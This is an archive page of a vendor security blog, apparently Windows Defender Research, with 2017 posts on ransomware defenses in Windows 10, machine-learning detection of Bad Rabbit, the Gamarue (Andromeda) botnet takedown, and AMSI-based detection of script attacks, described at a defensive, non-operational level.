Archive

Archive for the ‘Security Intelligence’ Category

A worthy upgrade: Next-gen security on Windows 10 proves resilient against ransomware outbreaks in 2017

January 10th, 2018 No comments

Adopting reliable attack methods and techniques borrowed from more evolved threat types, ransomware attained new levels of reach and damage in 2017. The following trends characterize the ransomware narrative in the past year:

  • Three global outbreaks showed the force of ransomware in making real-world impact, affecting corporate networks and bringing down critical services like hospitals, transportation, and traffic systems
  • Three million unique computers encountered ransomware; millions more saw downloader trojans, exploits, emails, websites and other components of the ransomware kill chain
  • New attack vectors, including compromised supply chain, exploits, phishing emails, and documents taking advantage of the DDE feature in Office were used to deliver ransomware
  • More than 120 new ransomware families, plus countless variants of established families and less prevalent ransomware caught by heuristic and generic detections, emerged from a thriving cybercriminal enterprise powered by ransomware-as-a-service

The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack vectors, makes older platforms so much more susceptible to ransomware attacks. From June to November, Windows 7 devices were 3.4 times more likely to encounter ransomware compared to Windows 10 devices. Considering that Windows 10 has a much larger install base than Windows 7, this difference in ransomware encounter rate is significant.

Figure 1. Ransomware encounter rates on Windows 7 and Windows 10 devices. Encounter rate refers to the percentage of computers running the OS version with Microsoft real-time security that blocked or detected ransomware.

The data shows that attackers are targeting Windows 7. Given todays modern threats, older platforms can be infiltrated more easily because these platforms dont have the advanced built-in end-to-end defense stack available on Windows 10. Continuous enhancements further make Windows 10 more resilient to ransomware and other types of attack.

Windows 10: Multi-layer defense against ransomware attacks

The year 2017 saw three global ransomware outbreaks driven by multiple propagation and infection techniques that are not necessarily new but not typically observed in ransomware. While there are technologies available on Windows 7 to mitigate attacks, Windows 10s comprehensive set of platform mitigations and next-generation technologies cover these attack methods. Additionally, Windows 10 S, which is a configuration of Windows 10 thats streamlined for security and performance, locks down devices against ransomware outbreaks and other threats.

In May, WannaCry (Ransom:Win32/WannaCrypt) caused the first global ransomware outbreak. It used EternalBlue, an exploit for a previously fixed SMBv1 vulnerability, to infect computers and spread across networks at speeds never before observed in ransomware.

On Windows 7, Windows AppLocker and antimalware solutions like Microsoft Security Essentials and System Center Endpoint Protection (SCEP) can block the infection process. However, because WannaCry used an exploit to spread and infect devices, networks with vulnerable Windows 7 devices fell victim. The WannaCry outbreak highlighted the importance of keeping platforms and software up-to-date, especially with critical security patches.

Windows 10 was not at risk from the WannaCry attack. Windows 10 has security technologies that can block the WannaCry ransomware and its spreading mechanism. Built-in exploit mitigations on Windows 10 (KASLR, NX HAL, and PAGE POOL), as well as kCFG (control-flow guard for kernel) and HVCI (kernel code-integrity), make Windows 10 much more difficult to exploit.

Figure 2. Windows 7 and Windows 10 platform defenses against WannaCry

In June, Petya (Ransom:Win32/Petya.B) used the same exploit that gave WannaCry its spreading capabilities, and added more propagation and infection methods to give birth to arguably the most complex ransomware in 2017. Petyas initial infection vector was a compromised software supply chain, but the ransomware quickly spread using the EternalBlue and EternalRomance exploits, as well as a module for lateral movement using stolen credentials.

On Windows 7, Windows AppLocker can stop Petya from infecting the device. If a Windows 7 device is fully patched, Petyas exploitation behavior did not work. However, Petya also stole credentials, which it then used to spread across networks. Once running on a Windows 7 device, only an up-to-date antivirus that had protection in place at zero hour could stop Petya from encrypting files or tampering with the master boot record (MBR).

On the other hand, on Windows 10, Petya had more layers of defenses to overcome. Apart from Windows AppLocker, Windows Defender Application Control can block Petyas entry vector (i.e., compromised software updater running an untrusted binary), as well as the propagation techniques that used untrusted DLLs. Windows 10s built-in exploit mitigations can further protect Windows 10 devices from the Petya exploit. Credential Guard can prevent Petya from stealing credentials from local security authority subsystem service (LSASS), helping curb the ransomwares propagation technique. Meanwhile, Windows Defender System Guard (Secure Boot) can stop the MBR modified by Petya from being loaded at boot time, preventing the ransomware from causing damage to the master file table (MFT).

Figure 3. Windows 7 and Windows 10 platform defenses against Petya

In October, another sophisticated ransomware reared its ugly head: Bad Rabbit ransomware (Ransom:Win32/Tibbar.A) infected devices by posing as an Adobe Flash installer available for download on compromised websites. Similar to WannaCry and Petya, Bad Rabbit had spreading capabilities, albeit more traditional: it used a hardcoded list of user names and passwords. Like Petya, it can also render infected devices unbootable, because, in addition to encrypting files, it also encrypted entire disks.

On Windows 7 devices, several security solutions technologies can block the download and installation of the ransomware, but protecting the device from the damaging payload and from infecting other computers in the network can be tricky.

With Windows 10, however, in addition to stronger defense at the infection vector, corporate networks were safer from this damaging threat because several technologies are available to stop or detect Bad Rabbits attempt to spread across networks using exploits or hardcoded user names and passwords.

More importantly, during the Bad Rabbit outbreak, detonation-based machine learning models in Windows Defender AV cloud protection service, with no human intervention, correctly classified the malware 14 minutes after the very first encounter. The said detonation-based ML models are a part of several layers of machine learning and artificial intelligence technologies that evaluate files in order to reach a verdict on suspected malware. Using this layered approach, Windows Defender AV protected Windows 10 devices with cloud protection enabled from Bad Rabbit within minutes of the outbreak.

Figure 4. Windows 7 and Windows 10 platform defenses against Bad Rabbit

As these outbreaks demonstrated, ransomware has indeed become a highly complex threat that can be expected to continue evolving in 2018 and beyond. The multiple layers of next-generation security technologies on Windows 10 are designed to disrupt the attack methods that we have previously seen in highly specialized malware but now also see in ransomware.

Ransomware protection on Windows 10

For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.

Controlled folder access, however, is but one layer of defense. Ransomware and other threats from the web can be blocked by Microsoft Edge, whose exploit mitigation and sandbox features make it a very secure browser. Microsoft Edge significantly improves web security by using Windows Defender SmartScreens reputation-based blocking of malicious downloads and by opening pages within low-privilege app containers.

Windows Defender Antivirus also continues to enhance defense against threats like ransomware. Its advanced generic and heuristic techniques and layered machine learning models help catch both common and rare ransomware families. Windows Defender AV can detect and block most malware, including never-before-seen ransomware, using generics and heuristics, local ML models, and metadata-based ML models in the cloud. In rare cases that a threat slips past these layers of protection, Windows Defender AV can protect patient zero in real-time using analysis-based ML models, as demonstrated in a real-life case scenario where a customer was protected from a very new Spora ransomware in a matter of seconds. In even rarer cases of inconclusive initial classification, additional automated analysis and ML models can still protect customers within minutes, as what happened during the Bad Rabbit outbreak.

Windows 10 S locks down devices from unauthorized content by working exclusively with apps from the Windows Store and by using Microsoft Edge as the default browser. This streamlined, Microsoft-verified platform seals common entry points for ransomware and other threats.

Reducing the attack surface for ransomware and other threats in corporate networks

For enterprises and small businesses, the impact of ransomware is graver. Losing access to files can mean disrupted operations. Big enterprise networks, including critical infrastructures, fell victim to ransomware outbreaks. The modern enterprise network is under constant assault by attackers and needs to be defended on all fronts.

Windows Defender Exploit Guard locks down devices against a wide variety of attack vectors. Its host intrusion prevention capabilities include the following components, which block behaviors commonly used in malware attacks:

  • Attack Surface Reduction (ASR) is a set of controls that blocks common ransomware entry points: Office-, script-, and email-based threats that download and install ransomware; ASR can also protect from emerging exploits like DDEDownloader, which has been used to distribute ransomware
  • Network protection uses Windows Defender SmartScreen to block outbound connections to untrusted hosts, such as when trojan downloaders connect to a malicious server to obtain ransomware payloads
  • Controlled folder access blocks ransomware and other untrusted processes from accessing protected folders and encrypting files in those folders
  • Exploit protection (replacing EMET) provides mitigation against a broad set of exploit techniques that are now being used by ransomware authors

Additionally, the industry-best browser security in Microsoft Edge is enhanced by Windows Defender Application Guard, which brings Azure cloud grade isolation and security segmentation to Windows applications. This hardware isolation-level capability provides one of the highest levels of protection against zero-day exploits, unpatched vulnerabilities, and web-based malware.

For emails, Microsoft Exchange Online Protection (EOP) uses built-in anti-spam filtering capabilities that help protect Office 365 customers against ransomware attacks that begin with email. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Integrated security for enterprises

Windows Defender Advanced Threat Protection allows SecOps personnel to stop the spread of ransomware through timely detection of ransomware activity in the network. Windows Defender ATPs enhanced behavioral and machine learning detection libraries flag malicious behavior across the ransomware attack kill-chain, enabling SecOps to promptly investigate and respond to ransomware attacks.

With Windows 10 Fall Creators Update, Windows Defender ATP was expanded to include seamless integration across the entire Windows protection stack, including Windows Defender Exploit Guard, Windows Defender Application Guard, and Windows Defender AV. This integration is designed to provide a single pane of glass for a seamless security management experience.

With all of these security technologies, Microsoft has built the most secure Windows version ever with Windows 10. While the threat landscape will continue to evolve in 2018 and beyond, we dont stop innovating and investing in security solutions that continue to harden Windows 10 against attacks. The twice-per-year feature update release cycle reflects our commitment to innovate and to make it easier to disrupt successful attack techniques with new protection features. Upgrading to Windows 10 not only means decreased risk; it also means access to advanced, multi-layered defense against ransomware and other types of modern attacks.

 

Tanmay Ganacharya (@tanmayg)
Principal Group Manager, Windows Defender Research

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Detonating a bad rabbit: Windows Defender Antivirus and layered machine learning defenses

December 11th, 2017 No comments

Windows Defender Antivirus uses a layered approach to protection: tiers of advanced automation and machine learning models evaluate files in order to reach a verdict on suspected malware. While Windows Defender AV detects a vast majority of new malware files at first sight, we always strive to further close the gap between malware release and detection.

In a previous blog post, we looked at a real-world case study showing how Windows Defender Antivirus cloud protection service leverages next-gen security technologies to save “patient zero” from new malware threats in real-time. In that case study, a new Spora ransomware variant was analyzed and blocked within seconds using a deep neural network (DNN) machine learning classifier in the cloud. In this blog post well look at how additional automated analysis and machine learning models can further protect customers within minutes in rare cases where initial classification is inconclusive.

Layered machine learning models

In Windows Defender AVs layered approach to defense, if the first layer doesnt detect a threat, we move on to the next level of inspection. As we move down the layers, the amount of time required increases. However, we catch the vast majority of malware at the first (fastest) protection layers and only need to move on to a more sophisticated (but slower) level of inspection for rarer/more advanced threats.

For example, the vast majority of scanned objects are evaluated by the local Windows Defender client machine learning models, behavior-based detection algorithms, generic and heuristic classifications, and more. This helps ensure that users get the best possible performance. In rare cases where local intelligence cant reach a definitive verdict, Windows Defender AV will use the cloud for deeper analysis.

Figure 1. Layered detection model

For a more detailed look at our approach to protection, see The evolution of malware prevention.

Detonation-based machine learning classification

We use a variety of machine learning models that use different algorithms to predict whether a certain file is malware. Some of these algorithms are binary classifiers that give a strict clean-or-malware verdict (0 or 1), while others are multi-class classifiers that provide a probability for each classification (malware, clean, potentially unwanted application, etc). Each machine learning model is trained against a set of different features (often thousands, sometimes hundreds of thousands) to learn to distinguish between different kinds of programs.

For the fastest classifiers in our layered stack, the features may include static attributes of the file combined with events (for example, API calls or behaviors) seen while the scanning engine emulates the file using dynamic translation. If the results from these models are inconclusive, well take an even more in-depth look at what the malware does by actually executing it in a sandbox and observing its run-time behavior. This is known as dynamic analysis, or detonation, and happens automatically whenever we receive a new suspected malware sample.

The activities seen in the sandbox machine (for example, registry changes, file creation/deletion, process injection, network connections, and so forth) are recorded and provided as features to our ML models. These models can then combine both the static features obtained from scanning the file with the dynamic features observed during detonation to arrive at an even stronger prediction.

Figure 2. Detonation-based machine learning classification

Ransom:Win32/Tibbar.A Protection in 14 minutes

On October 24, 2017, in the wake of recent ransomware outbreaks such as Wannacry and NotPetya, news broke of a new threat spreading, primarily in Ukraine and Russia: Ransom:Win32/Tibbar.A (popularly known as Bad Rabbit).

This threat is a good example of how detonation-based machine learning came into play to protect Windows Defender AV customers. First though, lets look at what happened to patient zero.

At 11:17 a.m. local time on October 24, a user running Windows Defender AV in St. Petersburg, Russia was tricked into downloading a file named FlashUtil.exe from a malicious website. Instead of a Flash update, the program was really the just-released Tibbar ransomware.

Windows Defender AV scanned the file and determined that it was suspicious. A query was sent to the cloud protection service, where several metadata-based machine learning models found the file suspicious, but not with a high enough probability to block. The cloud protection service requested that Windows Defender AV client to lock the file, upload it for processing, and wait for a decision.

Within a few seconds the file was processed, and sample-analysis-based ML models returned their conclusions. In this case, a multi-class deep neural network (DNN) machine learning classifier correctly classified the Tibbar sample as malware, but with only an 81.6% probability score. In order to avoid false positives, cloud protection service is configured by default to require at least 90% probability to block the malware (these thresholds are continually evaluated and fine-tuned to find the right balance between blocking malware while avoiding the blocking of legitimate programs). In this case, the ransomware was allowed to run.

Figure 3. Ransom:Win32/Tibbar.A ransom note

Detonation chamber

In the meantime, while patient zero and eight other unfortunate victims (in Ukraine, Russia, Israel, and Bulgaria) contemplated whether to pay the ransom, the sample was detonated and details of the system changes made by the ransomware were recorded.

Figure 4. Sample detonation events used by the machine learning model

As soon as the detonation results were available, a multi-class deep neural network (DNN) classifier that used both static and dynamic features evaluated the results and classified the sample as malware with 90.7% confidence, high enough for the cloud to start blocking.

When a tenth Windows Defender AV customer in the Ukraine was tricked into downloading the ransomware at 11:31 a.m. local time, 14 minutes after the first encounter, cloud protection service used the detonation-based malware classification to immediately block the file and protect the customer.

At this point the cloud protection service had “learned” that this file was malware. It now only required metadata from the client with the hash of the file to issue blocking decisions and protect customers. As the attack gained momentum and began to spread, Windows Defender AV customers with cloud protection enabled were protected. Later, a more specific detection was released to identify the malware as Ransom:Win32/Tibbar.A.

Closing the gap

While we feel good about Windows Defender AV’s layered approach to protection, digging deeper and deeper with automation and machine learning in order to finally reach a verdict on suspected malware, we are continually seeking to close the gap even further between malware release and protection. The cases where we cannot block at first sight are increasingly rare, but there is so much to be done. As our machine learning models are continuously updated and retrained, we are able to make better predictions over time. Yet malware authors will not rest, and the ever-changing threat landscape requires continuous investment in new and better technologies to detect new threats, but also to effectively differentiate the good from the bad.

What about systems that do get infected while detonation and classification are underway? One area that we’re actively investing in is advanced remediation techniques that will let us reach back out to those systems in an organization that were vulnerable and, if possible, get them back to a healthy state.

If you are organization that is willing to accept a higher false positive risk in exchange for stronger protection, you can configure the cloud protection level to tell the Windows Defender AV cloud protection service to take a more aggressive stance towards suspicious files, such as blocking at lower machine learning probability thresholds. In the Tibbar example above, for example, a configuration like this could have protected patient zero using the initial 81% confidence score, and not wait for the higher confidence (detonation-based) result that came later. You can also configure the cloud extended timeout to give the cloud protection service more time to evaluate a first-seen threat.

As another layer of real-time protection against ransomware, enable Controlled folder access, which is one of the features of the new Windows Defender Exploit Guard. Controlled folder access protects files from tampering by locking folders so that ransomware and other unauthorized apps cant access them.

For enterprises, Windows Defender Exploit Guards other features (Attack Surface Reduction, Exploit protection, and Network protection) further protect networks from advanced attacks. Windows Defender Advanced Threat Protection can also alert security operations personnel about malware activities in the network so that personnel can promptly investigate and respond to attacks.

For users running Windows 10 S, malware like Tibbar simply wont run. Windows 10 S provides advanced levels of security by exclusively running apps from the Microsoft Store. Threats such as Tibbar are non-issues for Windows 10 S users. Learn more about Windows 10 S.

New machine learning and AI techniques, in combination with both static and dynamic analysis, gives Windows Defender AV the ability to block more and more malware threats at first sight and, if that fails, learn as quickly as possible that something is bad and start blocking it. Using a layered approach, with different ML models at each layer, gives us the ability to target a wide variety of threats quickly while maintaining low false positive rates. As we gather more data about a potential threat, we can provide predictions with higher and higher confidence and take action accordingly. It is an exciting time to be in the fray.

 

Randy Treit

Senior Security Researcher, Windows Defender Research

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Microsoft teams up with law enforcement and other partners to disrupt Gamarue (Andromeda)

December 4th, 2017 No comments

Today, with help from Microsoft security researchers, law enforcement agencies around the globe, in cooperation with Microsoft Digital Crimes Unit (DCU), announced the disruption of Gamarue, a widely distributed malware that has been used in networks of infected computers collectively called the Andromeda botnet.

The disruption is the culmination of a journey that started in December 2015, when the Microsoft Windows Defender research team and DCU activated a Coordinated Malware Eradication (CME) campaign for Gamarue. In partnership with internet security firm ESET, we performed in-depth research into the Gamarue malware and its infrastructure.

Our analysis of more than 44,000 malware samples uncovered Gamarues sprawling infrastructure. We provided detailed information about that infrastructure to law enforcement agencies around the world, including:

  • 1,214 domains and IP addresses of the botnets command and control servers
  • 464 distinct botnets
  • More than 80 associated malware families

The coordinated global operation resulted in the takedown of the botnets servers, disrupting one of the largest malware operations in the world. Since 2011, Gamarue has been distributing a plethora of other threats, including:

A global malware operation

For the past six years, Gamarue has been a very active malware operation that, until the takedown, showed no signs of slowing down. Windows Defender telemetry in the last six months shows Gamarues global prevalence.

Figure 1. Gamarues global prevalence from May to November 2017

While the threat is global, the list of top 10 countries with Gamarue encounters is dominated by Asian countries.

Figure 2. Top 10 countries with the most Gamarue encounters from May to November 2017

In the last six months, Gamarue was detected or blocked on approximately 1,095,457 machines every month on average.

Figure 3. Machines, IPs, and unique file encounters for Gamarue from May to November 2017; data does not include LNK detections

The Gamarue bot

Gamarue is known in the underground cybercrime market as Andromeda bot. A bot is a program that allows an attacker to take control of an infected machine. Like many other bots, Gamarue is advertised as a crime kit that hackers can purchase.

The Gamarue crime kit includes the following components:

  • Bot-builder, which builds the malware binary that infects computers
  • Command-and-control application, which is a PHP-based dashboard application that allows hackers to manage and control the bots
  • Documentation on how to create a Gamarue botnet

A botnet is a network of infected machines that communicate with command-and-control (C&C) servers, which are computer servers used by the hacker to control infected machines.

The evolution of the Gamarue bot has been the subject of many thorough analyses by security researchers. At the time of takedown, there were five known active Gamarue versions: 2.06, 2.07, 2.08, 2.09, and 2.10. The latest and the most active is version 2.10.

Gamarue is modular, which means that its functionality can be extended by plugins that are either included in the crime kit or available for separate purchase. The Gamarue plugins include:

  • Keylogger ($150) Used for logging keystrokes and mouse activity in order to steal user names and passwords, financial information, etc
  • Rootkit (included in crime kit) Injects rootkit codes into all processes running on a victim computer to give Gamarue persistence
  • Socks4/5 (included in crime kit) Turns victim computer into a proxy server for serving malware or malicious instructions to other computers on the internet
  • Formgrabber ($250) Captures any data submitted through web browsers (Chrome, Firefox, and Internet Explorer)
  • Teamviewer ($250) Enables attacker to remotely control the victim machine, spy on the desktop, perform file transfer, among other functions
  • Spreader Adds capability to spread Gamarue malware itself via removable drives (for example, portable hard drives or flash drives connected via a USB port); it also uses Domain Name Generation (DGA) for the servers where it downloads updates

Gamarue attack kill-chain

Over the years, various attack vectors have been used to distribute Gamarue. These include:

  • Removable drives
  • Social media (such as Facebook) messages with malicious links to websites that host Gamarue
  • Drive-by downloads/exploit kits
  • Spam emails with malicious links
  • Trojan downloaders

Once Gamarue has infected a machine, it contacts the C&C server, making the machine part of the botnet. Through the C&C server, the hacker can control Gamarue-infected machines, steal information, or issue commands to download additional malware modules.

Figure 4. Gamarues attack kill-chain

Gamarues main goal is to distribute other prevalent malware families. During the CME campaign, we saw at least 80 different malware families distributed by Gamarue. Some of these malware families include:

The installation of other malware broadens the scale of what hackers can do with the network of infected machines.

Command-and-control communication

When the Gamarue malware triggers the infected machine to contact the C&C server, it provides information like the hard disks volume serial number (used as the bot ID for the computer), the Gamarue build ID, the operating system of the infected machine, the local IP address, an indication whether the signed in user has administrative rights, and keyboard language setting for the infected machine. This information is sent to the C&C server via HTTP using the JSON format:

Figure 5. Information sent by Gamarue to C&C server

The information about keyboard language setting is very interesting, because the machine will not be further infected if the keyboard language corresponds to the following countries:

  • Belarus
  • Russia
  • Ukraine
  • Kazahkstan

Before sending to the C&C server, this information is encrypted with RC4 algorithm using a key hardcoded in the Gamarue malware body.

Figure 6. Encrypted C&C communication

Once the C&C server receives the message, it sends a command that is pre-assigned by the hacker in the control dashboard.

Figure 7. Sample control dashboard used by attackers to communicate to Gamarue bots

The command can be any of the following:

  • Download EXE (i.e., additional executable malware files)
  • Download DLL (i.e., additional malware; removed in version 2.09 and later)
  • Install plugin
  • Update bot (i.e., update the bot malware)
  • Delete DLLs (removed in version 2.09 and later)
  • Delete plugins
  • Kill bot

The last three commands can be used to remove evidence of Gamarue presence in machines.

The reply from the C&C server is also encrypted with RC4 algorithm using the same key used to encrypt the message from the infected machine.

Figure 8. Encrypted reply from C&C server

When decrypted, the reply contains the following information:

  • Time interval in minutes time to wait for when to ask the C2 server for the next command
  • Task ID – used by the hacker to track if there was an error performing the task
  • Command one of the command mentioned above
  • Download URL – from which a plugin/updated binary/other malware can be downloaded depending on the command.

Figure 9. Decrypted reply from C&C server

Anti-sandbox techniques

Gamarue employs anti-AV techniques to make analysis and detection difficult. Prior to infecting a machine, Gamarue checks a list hashes of the processes running on a potential victims machine. If it finds a process that may be associated with malware analysis tools, such as virtual machines or sandbox tools, Gamarue does not infect the machine. In older versions, a fake payload is manifested when running in a virtual machine.

Figure 10. Gamarue checks if any of the running processes are associated with malware analysis tools

Stealth mechanisms

Gamarue uses cross-process injection techniques to stay under the radar. It injects its code into the following legitimate processes:

  • msiexec.exe (Gamarue versions 2.07 to 2.10)
  • wuauclt.exe, wupgrade.exe, svchost.exe (version 2.06)

It can also use a rootkit plugin to hide the Gamarue file and its autostart registry entry.

Gamarue employs a stealthy technique to store and load its plugins as well. The plugins are stored fileless, either saved in the registry or in an alternate data stream of the Gamarue file.

OS tampering

Gamarue attempts to tamper with the operating systems of infected computers by disabling Firewall, Windows Update, and User Account Control functions. These functionalities cannot be re-enabled until the Gamarue infection has been removed from the infected machine. This OS tampering behavior does not work on Windows 10

Figure 11. Disabled Firewall and Windows Update

Monetization

There are several ways hackers earn using Gamarue. Since Gamarues main purpose is to distribute other malware, hackers earn using pay-per-install scheme. Using its plugins, Gamarue can also steal user information; stolen information can be sold to other hackers in cybercriminal underground markets. Access to Gamarue-infected machines can also be sold, rented, leased, or swapped by one criminal group to another.

Remediation

To help prevent a Gamarue infection, as well as other malware and unwanted software, take these precautions:

  • Be cautious when opening emails or social media messages from unknown users.
  • Be wary about downloading software from websites other than the program developers.

More importantly, ensure you have the right security solutions that can protect your machine from Gamarue and other threats. Windows Defender Antivirus detects and removes the Gamarue malware. With advanced machine learning models, as well as generic and heuristic techniques, Windows Defender AV detects new as well as never-before-seen malware in real-time via the cloud protection service. Alternatively, standalone tools, such as Microsoft Safety Scanner and the Malicious Software Removal Tool (MSRT), can also detect and remove Gamarue.

Microsoft Edge can block Gamarue infections from the web, such as those from malicious links in social media messages and drive-by downloads or exploit kits. Microsoft Edge is a secure browser that opens pages within low privilege app containers and uses reputation-based blocking of malicious downloads.

In enterprise environments, additional layers of protection are available. Windows Defender Advanced Threat Protection can help security operations personnel to detect Gamarue activities, including cross-process injection techniques, in the network so they can investigate and respond to attacks. Windows Defender ATPs enhanced behavioral and machine learning detection libraries flag malicious behavior across the malware infection process, from delivery and installation, to persistence mechanisms, and command-and-control communication.

Microsoft Exchange Online Protection (EOP) can block Gamarue infections from email uses built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Windows Defender Exploit Guard can block malicious documents (such as those that distribute Gamarue) and scripts. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo).

Microsoft is also continuing the collaborative effort to help clean Gamarue-infected computers by providing a one-time package with samples (through the Virus Information Alliance) to help organizations protect their customers.

 

 

Microsoft Digital Crimes Unit and Windows Defender Research team

 

 

Get more info on the Gamarue (Andromeda) takedown from the following sources:

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that ‘live off the land’

December 4th, 2017 No comments

Data center

Scripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.

Scripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the landstaying away from the disk and using common tools to run code directly in memory. Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps make them effective vehicles for delivering malicious implants through social engineering as evidenced by the increasing use of scripts in spam campaigns.

Malicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShellthe de facto scripting standard for administrative tasks on Windowswith the ability to invoke system APIs and access a variety of system classes and objects.

While the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.

Windows 10 provides optics into script behavior through Antimalware Scan Interface (AMSI), a generic, open interface that enables Windows Defender Antivirus to look at script contents the same way script interpreters doin a form that is both unencrypted and unobfuscated. In Windows 10 Fall Creators Update, with knowledge from years analyzing script-based malware, weve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.

This unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection (Windows Defender ATP). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.

In this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP machine learning systems make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.

KRYPTON: Highlighting the resilience of script-based attacks

Traditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.

Apart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it is impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.

For example, the activity group KRYPTON has been observed hijacking or creating scheduled tasksthey often target system tasks found in exclusion lists of popular forensic tools like Autoruns for Windows. KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.

To illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by John Lambert and the Office 365 Advanced Threat Protection team.

KRYPTON lure document

Figure 1. KRYPTON lure document

To live off the land, KRYPTON doesnt drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (wscript.exe) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.

KRYPTON script execution chain through wscript.exe

Figure 2. KRYPTON script execution chain through wscript.exe

Exposing actual script behavior with AMSI

AMSI overcomes KRYPTONs evasion mechanisms by capturing JavaScript API calls after they have been decrypted and ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.

Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

By checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.

Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

PowerShell use by Kovter and other commodity malware

Not only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, Kovter malware uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by a JavaScript (executed by wscript.exe) and passed to powershell.exe as an environment variable.

Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

By looking at the PowerShell payload content captured by AMSI, experienced analysts can easily spot similarities to PowerSploit, a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.

Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Fresh machine learning insight with AMSI

While AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.

As outlined in our previous blog, we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.

Process tree augmented by instrumentation for AMSI data

Figure 7. Process tree augmented by instrumentation for AMSI data

As shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (winword.exe) to launch PowerShell (powershell.exe). In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware fhjUQ72.tmp, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build expert classifiers for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.

